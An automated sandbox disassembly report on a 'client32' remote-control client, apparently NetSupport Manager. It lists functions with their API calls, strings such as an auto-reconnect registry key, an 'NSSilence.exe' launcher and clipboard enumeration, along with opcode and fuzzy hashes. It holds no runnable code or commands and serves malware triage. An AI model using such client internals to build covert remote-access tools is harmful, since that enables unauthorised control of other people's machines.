String ID: Adding Journal Item, type=%d$Client$DisableJournal$Journal prevented duplicate lesson details$NC_JOURNAL jcmd=%d$Start Journal, params=%s$Stop Journal$TraceJournal$_debug$libhpdf.dll
API String ID: 398114495-2831585317
Opcode ID: 203af461ad6f42f92b1f722168bf1edabb8d7737599ffdeb83d12517f56ea3f0
Instruction ID: 035b83a0cb74351545b72c4d140cfb5a1e93af7cf425db96e5df00653b109bf5
Opcode Fuzzy Hash: 203af461ad6f42f92b1f722168bf1edabb8d7737599ffdeb83d12517f56ea3f0
Instruction Fuzzy Hash: FFE19578E0420ADFDB05DBA4C8D0FEEB7B5AF49308F248178D8559B784EB75A904CB52

Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D3A1

Strings

Unknown error %d, xrefs: 1100D397
StillInstances, xrefs: 1100D38F
AlreadyStarted, xrefs: 1100D365
AlreadyStopped, xrefs: 1100D36C
CannotLoadDll, xrefs: 1100D350
Exception, xrefs: 1100D388, 1100D396
BadParam, xrefs: 1100D381
NotFound, xrefs: 1100D37A
NoCapClients, xrefs: 1100D373
DllInitFailed, xrefs: 1100D357
RequiresVista, xrefs: 1100D349
CannotGetFunc, xrefs: 1100D35E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5

Function 1104D8F0 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 216registryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000002), ref: 1104DA8B

Strings

MacAddress, xrefs: 1104DA34
SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 1104D982, 1104D9A8
DisableReconnect, xrefs: 1104D927
Client, xrefs: 1104D92C, 1104DA39
%s|%s|, xrefs: 1104DA58

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Value__wcstoi64
String ID: %s|%s|$Client$DisableReconnect$MacAddress$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
API String ID: 2540774538-4016704742
Opcode ID: 57d7aad6e991e3df088d1ffd76509d0321b7a4523fdcfdd66f865d7433f96b25
Instruction ID: 05e8bff5040e29a5b9abc2ffadfdacbba53fbc28b77198bd54f2eb1c0cd91964
Opcode Fuzzy Hash: 57d7aad6e991e3df088d1ffd76509d0321b7a4523fdcfdd66f865d7433f96b25
Instruction Fuzzy Hash: 6871A475E00205AFEB14CBA4CC85FEEF7A8EF59318F24456CE519AB680DB71B900CB61

Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(B24479DC,00000000,0000000A,?), ref: 110695BD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3,000000FF), ref: 11069621
wsprintfA.USER32 ref: 11069651
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7

Strings

CloseTransports slept for %u ms, xrefs: 11069630
idata->n_connections=%d, xrefs: 1106964B
..\ctl32\Connect.cpp, xrefs: 11069661

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
API String ID: 2285713701-3017572385
Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94

Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264

CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
_strrchr.LIBCMT ref: 1100D6EF
GetCurrentProcessId.KERNEL32 ref: 1100D6FF
wsprintfA.USER32 ref: 1100D720
_memset.LIBCMT ref: 1100D731
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
CloseHandle.KERNEL32(?), ref: 1100D781
CloseHandle.KERNEL32(?), ref: 1100D78A

Strings

D, xrefs: 1100D75F
%sNSSilence.exe %u %u, xrefs: 1100D71A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
String ID: %sNSSilence.exe %u %u$D
API String ID: 1760462761-4146734959
Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64

Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(?), ref: 1100306D
GetStockObject.GDI32(00000007), ref: 11003089
SelectObject.GDI32(?,00000000), ref: 1100309A
SelectObject.GDI32(?,?), ref: 110030A7
InflateRect.USER32 ref: 110030D8
GetSysColor.USER32(00000004), ref: 110030EB
SetBkColor.GDI32(?,00000000), ref: 110030F6
Rectangle.GDI32(?,?,?,?,?), ref: 11003110
SelectObject.GDI32(?,?), ref: 1100311E
SelectObject.GDI32(?,?), ref: 11003128
DeleteObject.GDI32(?), ref: 1100312E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
String ID:
API String ID: 4121194973-0
Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0

Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1113F7AB
__CxxThrowException@8.LIBCMT ref: 1113F7C0
SetPropA.USER32(?,?,00000000), ref: 1113F84E
GetPropA.USER32(?), ref: 1113F85D
wsprintfA.USER32 ref: 1113F88F
RemovePropA.USER32(?), ref: 1113F8C1

Strings

hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1113F889
UI.CPP, xrefs: 1113F811, 1113F832, 1113F8A2
NSMStatsWindow::m_aProp, xrefs: 1113F837

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 2013984029-1590351400
Opcode ID: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
Opcode Fuzzy Hash: e646804ecc7ddf954b9f726e774aae96fceda95ccf96e222f81c043a3edeb97b
Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1

Function 110099B0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11009B95
_strtok.LIBCMT ref: 11009BD3
_malloc.LIBCMT ref: 11009BED

Strings

*extra_bytes, xrefs: 11009B77, 11009CE8
Send EV_CONFIGSET from %s@%d, xrefs: 11009D0A
nbytes <= sizeof (extra_bytes), xrefs: 11009BB6
..\ctl32\AUDIO.CPP, xrefs: 11009BB1, 11009C00, 11009D05
Audio, xrefs: 11009B1C, 11009B36, 11009B7C, 11009CED

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$_malloc
String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
API String ID: 665538724-3655815180
Opcode ID: 710627598e3b966366d406d7ea3925015b8042895ddc3fbf13d12b3ddc031e79
Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
Opcode Fuzzy Hash: 710627598e3b966366d406d7ea3925015b8042895ddc3fbf13d12b3ddc031e79
Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91

Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON

Download Yara Rule

APIs

CountClipboardFormats.USER32 ref: 11033091

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

EnumClipboardFormats.USER32(00000000), ref: 110330F6
GetLastError.KERNEL32 ref: 110331BF
GetLastError.KERNEL32(00000000), ref: 110331C2
IsClipboardFormatAvailable.USER32(00000008), ref: 11033225

Strings

..\ctl32\clipbrd.cpp, xrefs: 1103307B
ppFormats, xrefs: 11033080
Error enumclip, e=%d, x%x, xrefs: 110331C5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
API String ID: 3210887762-597690070
Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90

Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111EE294,B24479DC,?,?,?,?,00000000,11181BDE), ref: 110535C4
LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11053635
__CxxThrowException@8.LIBCMT ref: 1105364A
GetTickCount.KERNEL32(?,00000000,11181BDE), ref: 11053660
std::_Xinvalid_argument.LIBCPMT ref: 11053747
LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1105367B
IsA(), xrefs: 11053680
list<T> too long, xrefs: 11053742

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
API String ID: 2238969640-1197860701
Opcode ID: a4441b3a21ad501530920e862548792869f6a52b65b69d05ed3757c135f1c0d1
Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
Opcode Fuzzy Hash: a4441b3a21ad501530920e862548792869f6a52b65b69d05ed3757c135f1c0d1
Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5

Function 111076E0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(B24479DC,1102E747,?,00000000,000000FF), ref: 11107715
EnterCriticalSection.KERNEL32 ref: 11107728
GetTickCount.KERNEL32 ref: 1110772E
_strncpy.LIBCMT ref: 111077EB
GetTickCount.KERNEL32 ref: 1110780C
LeaveCriticalSection.KERNEL32(0NN), ref: 11107815

Strings

0NN, xrefs: 11107719, 11107721, 1110780E
SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
Warning. took %d ms to get simap lock, xrefs: 1110773D
Warning. simap lock held for %d ms, xrefs: 11107825

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CriticalSection$EnterLeave_strncpy
String ID: 0NN$SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
API String ID: 3891031082-3295293343
Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90

Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,774E42C0,00000000), ref: 11065525

